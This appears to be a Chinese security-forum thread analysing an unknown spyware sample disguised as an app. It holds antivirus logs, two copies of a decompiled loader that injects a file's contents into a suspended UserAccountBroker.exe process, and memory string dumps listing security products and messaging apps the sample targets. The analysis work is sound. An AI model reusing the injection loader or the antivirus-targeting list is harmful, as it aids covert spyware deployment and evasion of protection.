楼主: 神龟Turmi
收起左侧

[病毒样本] 未知Spyware #FakeAPP 1X

[复制链接]
haneoto
发表于 2025-10-19 13:06:40 | 显示全部楼层
冰盾

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +2 收起 理由
scottxzt + 2

查看全部评分

22222221
发表于 2025-10-19 13:07:50 | 显示全部楼层
emsisoft断网+关实时监控
2025/10/19 13:05:47
行为监控检测 可疑行为 "AutorunCreation" 来自于 C:\Users\Administrator\AppData\Roaming\Embarcadero\AutoRecoverDat.dll (SHA1: F9C895C9DB13B38C840B8A1EADF0F9E8B8B48270)

2025/10/19 13:05:47
通知: "在以下程序中发现了可疑行为: C:\Users\Administrator\AppData\Roaming\Embarcadero\AutoRecoverDat.dll" .

2025/10/19 13:06:08
用户 "DESKTOP-23FPJTB\Administrator" 点击 "好的"


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
scottxzt + 1

查看全部评分

wwwab
发表于 2025-10-19 15:32:30 | 显示全部楼层
这Shellcode,一眼顶真:

C:\Users\PC\AppData\Local\Profiler.json
  1. __int64 __fastcall sub_18C77(__int64 a1, char a2)
  2. {
  3.   int i; // [rsp+50h] [rbp-358h]
  4.   int j; // [rsp+54h] [rbp-354h]
  5.   int k; // [rsp+58h] [rbp-350h]
  6.   unsigned int v6; // [rsp+5Ch] [rbp-34Ch]
  7.   __int64 v7; // [rsp+60h] [rbp-348h]
  8.   char v8[16]; // [rsp+68h] [rbp-340h] BYREF
  9.   char v9[16]; // [rsp+78h] [rbp-330h] BYREF
  10.   char v10[8]; // [rsp+88h] [rbp-320h] BYREF
  11.   char v11[48]; // [rsp+90h] [rbp-318h] BYREF
  12.   __int64 v12; // [rsp+C0h] [rbp-2E8h]
  13.   __int64 v13; // [rsp+C8h] [rbp-2E0h]
  14.   __int64 v14[3]; // [rsp+D0h] [rbp-2D8h] BYREF
  15.   int v15; // [rsp+E8h] [rbp-2C0h] BYREF
  16.   __int64 v16; // [rsp+F0h] [rbp-2B8h] BYREF
  17.   __int64 v17; // [rsp+F8h] [rbp-2B0h]
  18.   __int64 v18; // [rsp+100h] [rbp-2A8h] BYREF
  19.   int v19[28]; // [rsp+110h] [rbp-298h] BYREF
  20.   char v20[272]; // [rsp+180h] [rbp-228h] BYREF
  21.   char v21[280]; // [rsp+290h] [rbp-118h] BYREF

  22.   memset(v21, 0, 0x104ui64);
  23.   strcpy(v10, "APPDATA");
  24.   (*(void (__fastcall **)(char *, char *, __int64))(a1 + 64))(v10, v21, 260i64);
  25.   memset(v20, 0, 0x104ui64);
  26.   for ( i = 0; v21[i]; ++i )
  27.     v20[i] = v21[i];
  28.   if ( a2 )
  29.   {
  30.     strcpy(v9, "\\GPUCache2.xml");
  31.     for ( j = 0; v9[j]; ++j )
  32.       v20[j + i] = v9[j];
  33.     v20[j + i] = 0;
  34.   }
  35.   else
  36.   {
  37.     strcpy(v8, "\\GPUCache.xml");
  38.     for ( k = 0; v8[k]; ++k )
  39.       v20[k + i] = v8[k];
  40.     v20[k + i] = 0;
  41.   }
  42.   v12 = (*(__int64 (__fastcall **)(char *, __int64, __int64, _QWORD, int, int, _QWORD))(a1 + 40))(
  43.           v20,
  44.           0x80000000i64,
  45.           1i64,
  46.           0i64,
  47.           3,
  48.           128,
  49.           0i64);
  50.   if ( v12 == -1 )
  51.     return 0i64;
  52.   v6 = (*(__int64 (__fastcall **)(__int64, _QWORD))(a1 + 48))(v12, 0i64);
  53.   if ( v6
  54.     && (v7 = (*(__int64 (__fastcall **)(_QWORD, _QWORD, __int64, __int64))(a1 + 24))(0i64, v6, 12288i64, 4i64)) != 0 )
  55.   {
  56.     v15 = 0;
  57.     if ( (*(unsigned int (__fastcall **)(__int64, __int64, _QWORD, int *, _QWORD))(a1 + 56))(v12, v7, v6, &v15, 0i64) )
  58.     {
  59.       (*(void (__fastcall **)(__int64))(a1 + 120))(v12);
  60.       v16 = 0i64;
  61.       (*(void (__fastcall **)(__int64 *))(a1 + 128))(&v16);
  62.       strcpy(v11, "C:\\Windows\\SysWOW64\\UserAccountBroker.exe");
  63.       memset(v19, 0, 0x68ui64);
  64.       v19[0] = 104;
  65.       memset(v14, 0, sizeof(v14));
  66.       if ( (*(unsigned int (__fastcall **)(char *, _QWORD, _QWORD, _QWORD, _DWORD, int, _QWORD, _QWORD, int *, __int64 *))(a1 + 72))(
  67.              v11,
  68.              0i64,
  69.              0i64,
  70.              0i64,
  71.              0,
  72.              4,
  73.              0i64,
  74.              0i64,
  75.              v19,
  76.              v14) )
  77.       {
  78.         (*(void (__fastcall **)(__int64))(a1 + 136))(v16);
  79.         v13 = (*(__int64 (__fastcall **)(__int64, _QWORD, _QWORD, __int64, int))(a1 + 80))(
  80.                 v14[0],
  81.                 0i64,
  82.                 v6,
  83.                 12288i64,
  84.                 64);
  85.         if ( v13 )
  86.         {
  87.           v18 = 0i64;
  88.           if ( (*(unsigned int (__fastcall **)(__int64, __int64, __int64, _QWORD, __int64 *))(a1 + 104))(
  89.                  v14[0],
  90.                  v13,
  91.                  v7,
  92.                  v6,
  93.                  &v18)
  94.             && (v17 = (*(__int64 (__fastcall **)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))(a1 + 96))(
  95.                         v14[0],
  96.                         0i64,
  97.                         0i64,
  98.                         v13,
  99.                         0i64,
  100.                         0,
  101.                         0i64)) != 0 )
  102.           {
  103.             (*(void (__fastcall **)(__int64))(a1 + 112))(v14[1]);
  104.             (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  105.             (*(void (__fastcall **)(__int64))(a1 + 120))(v17);
  106.             (*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
  107.             (*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
  108.             return 1i64;
  109.           }
  110.           else
  111.           {
  112.             (*(void (__fastcall **)(__int64, __int64, _QWORD, __int64))(a1 + 88))(v14[0], v13, 0i64, 0x8000i64);
  113.             (*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
  114.             (*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
  115.             (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  116.             return 0i64;
  117.           }
  118.         }
  119.         else
  120.         {
  121.           (*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
  122.           (*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
  123.           (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  124.           return 0i64;
  125.         }
  126.       }
  127.       else
  128.       {
  129.         (*(void (__fastcall **)(__int64))(a1 + 136))(v16);
  130.         (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  131.         return 0i64;
  132.       }
  133.     }
  134.     else
  135.     {
  136.       (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  137.       (*(void (__fastcall **)(__int64))(a1 + 120))(v12);
  138.       return 0i64;
  139.     }
  140.   }
  141.   else
  142.   {
  143.     (*(void (__fastcall **)(__int64))(a1 + 120))(v12);
  144.     return 0i64;
  145.   }
  146. }
复制代码


C:\Users\PC\AppData\Roaming\Embarcadero\GPUCache.xml
  1. __int64 __fastcall sub_3044F(__int64 a1, char a2)
  2. {
  3.   int i; // [rsp+50h] [rbp-358h]
  4.   int j; // [rsp+54h] [rbp-354h]
  5.   int k; // [rsp+58h] [rbp-350h]
  6.   unsigned int v6; // [rsp+5Ch] [rbp-34Ch]
  7.   __int64 v7; // [rsp+60h] [rbp-348h]
  8.   char v8[16]; // [rsp+68h] [rbp-340h] BYREF
  9.   char v9[16]; // [rsp+78h] [rbp-330h] BYREF
  10.   char v10[8]; // [rsp+88h] [rbp-320h] BYREF
  11.   char v11[48]; // [rsp+90h] [rbp-318h] BYREF
  12.   __int64 v12; // [rsp+C0h] [rbp-2E8h]
  13.   __int64 v13; // [rsp+C8h] [rbp-2E0h]
  14.   __int64 v14[3]; // [rsp+D0h] [rbp-2D8h] BYREF
  15.   int v15; // [rsp+E8h] [rbp-2C0h] BYREF
  16.   __int64 v16; // [rsp+F0h] [rbp-2B8h] BYREF
  17.   __int64 v17; // [rsp+F8h] [rbp-2B0h]
  18.   __int64 v18; // [rsp+100h] [rbp-2A8h] BYREF
  19.   int v19[28]; // [rsp+110h] [rbp-298h] BYREF
  20.   char v20[272]; // [rsp+180h] [rbp-228h] BYREF
  21.   char v21[280]; // [rsp+290h] [rbp-118h] BYREF

  22.   memset(v21, 0, 0x104ui64);
  23.   strcpy(v10, "APPDATA");
  24.   (*(void (__fastcall **)(char *, char *, __int64))(a1 + 64))(v10, v21, 260i64);
  25.   memset(v20, 0, 0x104ui64);
  26.   for ( i = 0; v21[i]; ++i )
  27.     v20[i] = v21[i];
  28.   if ( a2 )
  29.   {
  30.     strcpy(v9, "\\config2.ini");
  31.     for ( j = 0; v9[j]; ++j )
  32.       v20[j + i] = v9[j];
  33.     v20[j + i] = 0;
  34.   }
  35.   else
  36.   {
  37.     strcpy(v8, "\\config.ini");
  38.     for ( k = 0; v8[k]; ++k )
  39.       v20[k + i] = v8[k];
  40.     v20[k + i] = 0;
  41.   }
  42.   v12 = (*(__int64 (__fastcall **)(char *, __int64, __int64, _QWORD, int, int, _QWORD))(a1 + 40))(
  43.           v20,
  44.           0x80000000i64,
  45.           1i64,
  46.           0i64,
  47.           3,
  48.           128,
  49.           0i64);
  50.   if ( v12 == -1 )
  51.     return 0i64;
  52.   v6 = (*(__int64 (__fastcall **)(__int64, _QWORD))(a1 + 48))(v12, 0i64);
  53.   if ( v6
  54.     && (v7 = (*(__int64 (__fastcall **)(_QWORD, _QWORD, __int64, __int64))(a1 + 24))(0i64, v6, 12288i64, 4i64)) != 0 )
  55.   {
  56.     v15 = 0;
  57.     if ( (*(unsigned int (__fastcall **)(__int64, __int64, _QWORD, int *, _QWORD))(a1 + 56))(v12, v7, v6, &v15, 0i64) )
  58.     {
  59.       (*(void (__fastcall **)(__int64))(a1 + 120))(v12);
  60.       v16 = 0i64;
  61.       (*(void (__fastcall **)(__int64 *))(a1 + 128))(&v16);
  62.       strcpy(v11, "C:\\Windows\\SysWOW64\\UserAccountBroker.exe");
  63.       memset(v19, 0, 0x68ui64);
  64.       v19[0] = 104;
  65.       memset(v14, 0, sizeof(v14));
  66.       if ( (*(unsigned int (__fastcall **)(char *, _QWORD, _QWORD, _QWORD, _DWORD, int, _QWORD, _QWORD, int *, __int64 *))(a1 + 72))(
  67.              v11,
  68.              0i64,
  69.              0i64,
  70.              0i64,
  71.              0,
  72.              4,
  73.              0i64,
  74.              0i64,
  75.              v19,
  76.              v14) )
  77.       {
  78.         (*(void (__fastcall **)(__int64))(a1 + 136))(v16);
  79.         v13 = (*(__int64 (__fastcall **)(__int64, _QWORD, _QWORD, __int64, int))(a1 + 80))(
  80.                 v14[0],
  81.                 0i64,
  82.                 v6,
  83.                 12288i64,
  84.                 64);
  85.         if ( v13 )
  86.         {
  87.           v18 = 0i64;
  88.           if ( (*(unsigned int (__fastcall **)(__int64, __int64, __int64, _QWORD, __int64 *))(a1 + 104))(
  89.                  v14[0],
  90.                  v13,
  91.                  v7,
  92.                  v6,
  93.                  &v18)
  94.             && (v17 = (*(__int64 (__fastcall **)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))(a1 + 96))(
  95.                         v14[0],
  96.                         0i64,
  97.                         0i64,
  98.                         v13,
  99.                         0i64,
  100.                         0,
  101.                         0i64)) != 0 )
  102.           {
  103.             (*(void (__fastcall **)(__int64))(a1 + 112))(v14[1]);
  104.             (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  105.             (*(void (__fastcall **)(__int64))(a1 + 120))(v17);
  106.             (*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
  107.             (*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
  108.             return 1i64;
  109.           }
  110.           else
  111.           {
  112.             (*(void (__fastcall **)(__int64, __int64, _QWORD, __int64))(a1 + 88))(v14[0], v13, 0i64, 0x8000i64);
  113.             (*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
  114.             (*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
  115.             (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  116.             return 0i64;
  117.           }
  118.         }
  119.         else
  120.         {
  121.           (*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
  122.           (*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
  123.           (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  124.           return 0i64;
  125.         }
  126.       }
  127.       else
  128.       {
  129.         (*(void (__fastcall **)(__int64))(a1 + 136))(v16);
  130.         (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  131.         return 0i64;
  132.       }
  133.     }
  134.     else
  135.     {
  136.       (*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
  137.       (*(void (__fastcall **)(__int64))(a1 + 120))(v12);
  138.       return 0i64;
  139.     }
  140.   }
  141.   else
  142.   {
  143.     (*(void (__fastcall **)(__int64))(a1 + 120))(v12);
  144.     return 0i64;
  145.   }
  146. }
复制代码
神龟Turmi
 楼主| 发表于 2025-10-19 15:45:08 | 显示全部楼层
wwwab 发表于 2025-10-19 15:32
这Shellcode,一眼顶真:

C:%users\PC\AppData\Local\Profiler.json

但是我依然没看出来它最后的spy/rat是什么家族
只能写未知了
wwwab
发表于 2025-10-19 16:26:26 | 显示全部楼层
神龟Turmi 发表于 2025-10-19 15:45
但是我依然没看出来它最后的spy/rat是什么家族
只能写未知了

dll用Enigma(5.X)加壳了,不好分析
一堆空名区段,应该容易被kill

regsvr32加载dll,发生联网行为之后,进程内存下的字符串,挑了一些有意思的部分:
  1. [UNICODE] 0x000067d4: YourSharedSecretKey
  2. [UNICODE] 0x000067fc: Unknow
  3. [UNICODE] 0x00006810: %08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X
  4. [UNICODE] 0x00006874: NULL
  5. [UNICODE] 0x00006880: 0 min
  6. [UNICODE] 0x0000688c: %d min
  7. [UNICODE] 0x0000689c: FormatError
  8. [UNICODE] 0x000068b4: %04u-%02u-%02u %02u:%02u
  9. [UNICODE] 0x000068e8: error -- --
  10. [UNICODE] 0x00006900: SeDebugPrivilege
  11. [UNICODE] 0x00006924: FIRSTRUNTIME
  12. [UNICODE] 0x00006940: MicrosoftUser
  13. [UNICODE] 0x0000695c: IMPORT
  14. [UNICODE] 0x0000696c: #000000
  15. [UNICODE] 0x0000697c: IMPORTCOLOR
  16. [UNICODE] 0x0000699c: Group
  17. [UNICODE] 0x000069b0: Source
  18. [UNICODE] 0x000069c0: USERGUID
  19. [UNICODE] 0x000069d4: Note
  20. [UNICODE] 0x000069e0: USER_RET_LOGIN
  21. [UNICODE] 0x00006a00: 0x64
  22. [UNICODE] 0x00006a0c: 0x86
  23. [UNICODE] 0x00006a18: telegram.exe
  24. [UNICODE] 0x00006a34: whatsapp.exe
  25. [UNICODE] 0x00006a50: wechat.exe
  26. [UNICODE] 0x00006a68: USER_RET_OPERACTION
  27. [UNICODE] 0x00006a90: USER_RET_UPDATE_INFO
  28. [UNICODE] 0x00006af4: 琠潯氠湯g
  29. [UNICODE] 0x00006b00: Hips Software
  30. [UNICODE] 0x00006b1c: HipsTray.exe
  31. [UNICODE] 0x00006b38: Windows Defender
  32. [UNICODE] 0x00006b5c: SecurityHealthSystray.exe
  33. [UNICODE] 0x00006b90: MsMpEng.exe
  34. [UNICODE] 0x00006ba8: NisSrv.exe
  35. [UNICODE] 0x00006bc0: MsSense.exe
  36. [UNICODE] 0x00006bd8: MRT.exe
  37. [UNICODE] 0x00006be8: SenseNdr.exe
  38. [UNICODE] 0x00006c04: MpCmdRun.exe
  39. [UNICODE] 0x00006c20: MsASCui.exe
  40. [UNICODE] 0x00006c38: WdBoot.exe
  41. [UNICODE] 0x00006c50: WdMpService.exe
  42. [UNICODE] 0x00006c70: WdNisSvc.exe
  43. [UNICODE] 0x00006c8c: QiAnXin 360
  44. [UNICODE] 0x00006ca4: 360Tray.exe
  45. [UNICODE] 0x00006cbc: 360Safe.exe
  46. [UNICODE] 0x00006cd4: 360rps.exe
  47. [UNICODE] 0x00006cec: 360sd.exe
  48. [UNICODE] 0x00006d00: QaxProcessManager.exe
  49. [UNICODE] 0x00006d34: kxetray.exe
  50. [UNICODE] 0x00006d4c: Tencent PC Manager
  51. [UNICODE] 0x00006d74: QQPCTray.exe
  52. [UNICODE] 0x00006d90: QQPCRt.exe
  53. [UNICODE] 0x00006da8: QQPCMgr.exe
  54. [UNICODE] 0x00006dc0: TenSafe.exe
  55. [UNICODE] 0x00006dd8: Kaspersky
  56. [UNICODE] 0x00006dec: avp.exe
  57. [UNICODE] 0x00006dfc: kav.exe
  58. [UNICODE] 0x00006e0c: kis.exe
  59. [UNICODE] 0x00006e1c: AYAGENT
  60. [UNICODE] 0x00006e2c: AYAgent.exe
  61. [UNICODE] 0x00006e4c: v3l4sp.exe
  62. [UNICODE] 0x00006e64: LINE
  63. [UNICODE] 0x00006e70: LINE.exe
  64. [UNICODE] 0x00006e84: WhatsApp
  65. [UNICODE] 0x00006e98: WhatsApp.exe
  66. [UNICODE] 0x00006eb4: Telegram
  67. [UNICODE] 0x00006ec8: Telegram.exe
  68. [UNICODE] 0x00006eec: shutdown.exe
  69. [UNICODE] 0x00006f08: open
  70. [UNICODE] 0x00006f1c: -r -t 0
复制代码
  1. [UNICODE] 0x00080058: %SystemRoot%\system32\napinsp.dll
  2. [UNICODE] 0x00080198: vSockets STREAM
  3. [UNICODE] 0x000814d2: 扡摣晥桧橩汫湭灯牱瑳癵硷穹
  4. [UNICODE] 0x000814fe: 乍偏剑呓噕塗婙
  5. [UNICODE] 0x00081a3c: \device\harddiskvolume3\users\pc\appdata\roaming\embarcadero\activitylog.xml
  6. [UNICODE] 0x00081e7e: 言协垳櫕E也T
  7. [UNICODE] 0x000824f8: 尺獕牥屳畐汢捩
  8. [UNICODE] 0x0008253c: 潃獮汯e
  9. [UNICODE] 0x000825fc: 尺楗摮睯s
  10. [UNICODE] 0x00082638: 尺楗摮睯s
  11. [UNICODE] 0x000826ce: 踀epmapper
  12. [UNICODE] 0x0008283c: 尺楗摮睯s
  13. [UNICODE] 0x00082878: 尺獕牥屳畐汢捩
  14. [UNICODE] 0x0008299c: 潃獮汯e
  15. [UNICODE] 0x00082a58: 尺楗摮睯s
  16. [UNICODE] 0x00082f06: 踀C:\Windows\SysWOW64\taskschd.dll
  17. [UNICODE] 0x00082fa6: 蠀avp.exe
  18. [UNICODE] 0x00082fc0: kav.exe
  19. [UNICODE] 0x00082fd8: kis.exe
  20. [UNICODE] 0x000831d6: 踀C:\Windows\SysWOW64\taskschd.dll
  21. [UNICODE] 0x000833b6: 踀C:\Windows\System32\taskschd.dll
  22. [UNICODE] 0x00083456: 言C:\Windows\System32\fwpuclnt.dll
  23. [UNICODE] 0x000836d6: 谀C:\Windows\System32\CRYPTBASE.dll
  24. [UNICODE] 0x000838b6: 踀C:\Windows\SysWOW64\taskschd.dll
  25. [UNICODE] 0x0008432c: CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
  26. [UNICODE] 0x00084404: \device\harddiskvolume3\users\pc\appdata\roaming\embarcadero\activitylog.xml
  27. [UNICODE] 0x000845dc: \device\harddiskvolume3\users\pc\appdata\roaming\embarcadero\activitylog.xml
  28. [UNICODE] 0x00085aaa: 扡摣晥桧橩汫湭灯牱瑳癵硷穹
  29. [UNICODE] 0x00085ad6: 乍偏剑呓噕塗婙
  30. [UNICODE] 0x00085d60: AYAGENT
  31. [UNICODE] 0x00085e94: C:\Windows\Registration\R000000000006.clb
  32. [UNICODE] 0x00086440: C:\Windows\Registration\R000000000006.clb
  33. [UNICODE] 0x000866d4: CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
  34. [UNICODE] 0x000867d4: 1耀@%SystemRoot%\System32\winrnr.dll,-1000
  35. [UNICODE] 0x00086886: 耀-73e6154572dd}\TreatAs
  36. [UNICODE] 0x000869e6: 耀@%SystemRoot%\system32\nlasvc.dll,-1000
  37. [UNICODE] 0x00086b46: 耀@%SystemRoot%\system32\nlasvc.dll,-1000
  38. [UNICODE] 0x00086e06: 耀@%SystemRoot%\system32\nlasvc.dll,-1000
  39. [UNICODE] 0x00086e70: C:\Windows\system32\mswsock.dll
  40. [UNICODE] 0x00086f66: 耀\RPC Control\LRPC-2c3441683ca9470570
  41. [UNICODE] 0x0008727e: 耀@%SystemRoot%\System32\winrnr.dll,-1000
  42. [UNICODE] 0x0008732e: 耀MicrosoftEdge_X64_141.0.3537.85.exe
  43. [UNICODE] 0x00087386: 耀microsoftedge_x64_141.0.3537.85.exe
  44. [UNICODE] 0x000873de: 耀MicrosoftEdge_X64_141.0.3537.85.exe
  45. [UNICODE] 0x00087436: 蠀@%SystemRoot%\System32\winrnr.dll,-1000
  46. [UNICODE] 0x0008748e: 耀microsoftedge_x64_141.0.3537.85.exe
  47. [UNICODE] 0x000874e6: 耀microsoftedge_x64_141.0.3537.85.exe
  48. [UNICODE] 0x0008753e: 耀microsoftedge_x64_141.0.3537.85.exe
  49. [UNICODE] 0x00087596: 蠀A0886BCD-A0EE-42C5-B0B1-326A783A07BC
  50. [UNICODE] 0x000875ee: 耀microsoftedge_x64_141.0.3537.85.exe
  51. [UNICODE] 0x00087646: 耀microsoftedge_x64_141.0.3537.85.exe
  52. [UNICODE] 0x0008769e: 耀MicrosoftEdge_X64_141.0.3537.85.exe
  53. [UNICODE] 0x0008774e: 蠀@%SystemRoot%\system32\nlasvc.dll,-1000
  54. [UNICODE] 0x00087838: @%SystemRoot%\System32\mswsock.dll,-60100
  55. [UNICODE] 0x00087a3c: %SystemRoot%\system32\mswsock.dll
  56. [UNICODE] 0x000885b8: UTF-16
  57. [UNICODE] 0x000886f6: 耀Memory Compression
  58. [UNICODE] 0x00088740: regsvr32.exe
  59. [UNICODE] 0x0008879e: 蠀Windows Defender
  60. [UNICODE] 0x000887e8: WS2_32.dll
  61. [UNICODE] 0x000888bc: \device\ksecdd
  62. [UNICODE] 0x000888ee: 蠀Tencent PC Manager
  63. [UNICODE] 0x000889e0: LINE
  64. [UNICODE] 0x00088a3e: 蠀Windows Defender
  65. [UNICODE] 0x00088a62: ckets
  66. [UNICODE] 0x00088af8: AYAGENT
  67. [UNICODE] 0x00088b66: erviceClassInfo
  68. [UNICODE] 0x00088bcc: harddiskvolume3
  69. [UNICODE] 0x00088bec: Info
  70. [UNICODE] 0x00088bfe: 蠀QaxProcessManager.exe
  71. [UNICODE] 0x00088cde: 蠀Tencent PC Manager
  72. [UNICODE] 0x00088d16: 耀runtimebroker.exe
  73. [UNICODE] 0x00088d3c: t.exe
  74. [UNICODE] 0x00088d86: 耀RuntimeBroker.exe
  75. [UNICODE] 0x00088dac: t.exe
  76. [UNICODE] 0x000893d0: 1,"H5
  77. [UNICODE] 0x00089648: 麋诌aredSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedS麽诇retKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKe
  78. [UNICODE] 0x00089bf2: %*3eQ?
  79. [UNICODE] 0x00089cea: eyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourShAredSe
  80. [UNICODE] 0x0008c158: vSockets STREAM
  81. [UNICODE] 0x0008c35c: %windir%\system32\vsocklib.dll
  82. [UNICODE] 0x0008c5a8: %SystemRoot%\system32\pnrpnsp.dll
  83. [UNICODE] 0x0008c7f8: %SystemRoot%\system32\wshbth.dll
  84. [UNICODE] 0x0008ca46: 菝%SystemRoot%\system32\NLAapi.dll
  85. [UNICODE] 0x0008cc98: %SystemRoot%\System32\mswsock.dll
  86. [UNICODE] 0x0008cee8: %SystemRoot%\System32\winrnr.dll
复制代码
有窗口记录。。
  1. [ANSI] 0x0000b4c8: telegram.exe
  2. [ANSI] 0x0000b4e0: DingTalk.exe
  3. [ANSI] 0x0000b540: telegram.exe
  4. [ANSI] 0x0000b5e8: telegram.exe
  5. [ANSI] 0x0000b600: DingTalk.exe
  6. [ANSI] 0x0000b618: Telegram.exe
  7. [ANSI] 0x0000b630: WhatsApp.exes
  8. [ANSI] 0x0000b660: Telegram.exe
  9. [ANSI] 0x0000b6f0: telegram.exes
  10. [ANSI] 0x0000b708: WhatsApp.exes
  11. [ANSI] 0x0000b768: DingTalk.exes
  12. [ANSI] 0x0000b780: DingTalk.exes
  13. [ANSI] 0x0000b7b0: Telegram.exe
  14. [ANSI] 0x0000b7e0: DingTalk.exe
  15. [ANSI] 0x0000b828: DingTalk.exe
  16. [ANSI] 0x0000b858: DingTalk.exe
  17. [UNICODE] 0x00000dd4: \device\harddiskvolume3\windows\system32\cryptbase.dll
  18. [UNICODE] 0x00001104: \device\harddiskvolume3\windows\system32\cryptbase.dll
  19. [UNICODE] 0x0000118c: \device\harddiskvolume3\windows\system32\cryptbase.dll
  20. [UNICODE] 0x00001214: \device\harddiskvolume3\windows\system32\cryptbase.dll
  21. [UNICODE] 0x000016dc: \device\harddiskvolume3\windows\system32\cryptbase.dll
  22. [UNICODE] 0x00001764: \device\harddiskvolume3\windows\system32\cryptbase.dll
  23. [UNICODE] 0x00001a94: \device\harddiskvolume3\Windows\SysWOW64\CRYPTBASE.dll
  24. [UNICODE] 0x00001b1c: \device\harddiskvolume3\Windows\System32\CRYPTBASE.dll
  25. [UNICODE] 0x00002d4c: C耀360Tray.exe
  26. [UNICODE] 0x00002d76: 耀kxetray.exe
  27. [UNICODE] 0x00002d9e: 耀QQPCRt.exe
  28. [UNICODE] 0x00002dc6: 耀360rps.exe
  29. [UNICODE] 0x00002dee: 耀360sd.exe
  30. [UNICODE] 0x00002e04: ming
  31. [UNICODE] 0x00002e16: 耀kxetray.exe
  32. [UNICODE] 0x00002e3e: 耀QQPCRt.exe
  33. [UNICODE] 0x00002e66: 耀TenSafe.exe
  34. [UNICODE] 0x00002e8e: 耀Kaspersky
  35. [UNICODE] 0x00002eb6: 耀AYAgent.exe
  36. [UNICODE] 0x00002ede: 耀WdMpService.exe
  37. [UNICODE] 0x00002f06: 蠀MsSense.exe
  38. [UNICODE] 0x00002f2e: 蠀Hips Software
  39. [UNICODE] 0x00002f56: 耀QQPCTray.exe
  40. [UNICODE] 0x00002f7e: 耀QiAnXin 360
  41. [UNICODE] 0x00002fa6: 耀TenSafe.exe
  42. [UNICODE] 0x00002fce: 耀v3l4sp.exe
  43. [UNICODE] 0x00002ff6: 蠀SenseNdr.exe
  44. [UNICODE] 0x0000301e: 耀WdNisSvc.exe
  45. [UNICODE] 0x00003046: 耀v3l4sp.exe
  46. [UNICODE] 0x0000306e: 耀QQPCMgr.exe
  47. [UNICODE] 0x00003096: 耀AYAgent.exe
  48. [UNICODE] 0x000030be: 蠀NisSrv.exe
  49. [UNICODE] 0x000030e6: 耀360Safe.exe
  50. [UNICODE] 0x0000310e: 耀QQPCMgr.exe
  51. [UNICODE] 0x00003136: 蠀HipsTray.exe
  52. [UNICODE] 0x0000315e: 耀QQPCTray.exe
  53. [UNICODE] 0x00003186: 耀360sd.exe
  54. [UNICODE] 0x000031ae: 蠀MsMpEng.exe
  55. [UNICODE] 0x000031d6: 耀360rps.exe
  56. [UNICODE] 0x000031fe: 耀360Tray.exe
  57. [UNICODE] 0x00003226: 耀360Safe.exe
  58. [UNICODE] 0x0000324e: 耀WdNisSvc.exe
  59. [UNICODE] 0x00003276: 耀WdBoot.exe
  60. [UNICODE] 0x0000329e: 耀NisSrv.exe
  61. [UNICODE] 0x000032c6: 耀MsMpEng.exe
  62. [UNICODE] 0x000032ee: 耀HipsTray.exe
  63. [UNICODE] 0x00003316: 耀MsASCui.exe
  64. [UNICODE] 0x0000333e: 耀SenseNdr.exe
  65. [UNICODE] 0x00003366: 耀NisSrv.exe
  66. [UNICODE] 0x0000338e: 耀WdMpService.exe
  67. [UNICODE] 0x000033b6: 耀HipsTray.exe
  68. [UNICODE] 0x000033de: 耀MpCmdRun.exe
  69. [UNICODE] 0x00003406: 耀MpCmdRun.exe
  70. [UNICODE] 0x0000342e: 耀MsSense.exe
  71. [UNICODE] 0x00003456: 耀SenseNdr.exe
  72. [UNICODE] 0x0000347e: 耀MsSense.exe
  73. [UNICODE] 0x000034a6: 耀MsASCui.exe
  74. [UNICODE] 0x000034ce: 耀WdBoot.exe
  75. [UNICODE] 0x000034f6: 耀MsMpEng.exe
  76. [UNICODE] 0x00003554: t蠀QiAnXin 360
  77. [UNICODE] 0x0000357e: 蠀360Tray.exe
  78. [UNICODE] 0x000035a6: 蠀360sd.exe
  79. [UNICODE] 0x000035ce: 蠀QiAnXin 360
  80. [UNICODE] 0x000035f6: 耀notepad.exe
  81. [UNICODE] 0x0000361e: 蠀MpCmdRun.exe
  82. [UNICODE] 0x00003646: 蠀360Safe.exe
  83. [UNICODE] 0x0000366e: 蠀Kaspersky
  84. [UNICODE] 0x00003696: 耀onedrive.exe
  85. [UNICODE] 0x000036be: 蠀WhatsApp
  86. [UNICODE] 0x000036e6: 蠀Telegram
  87. [UNICODE] 0x0000370e: 耀notepad.exe
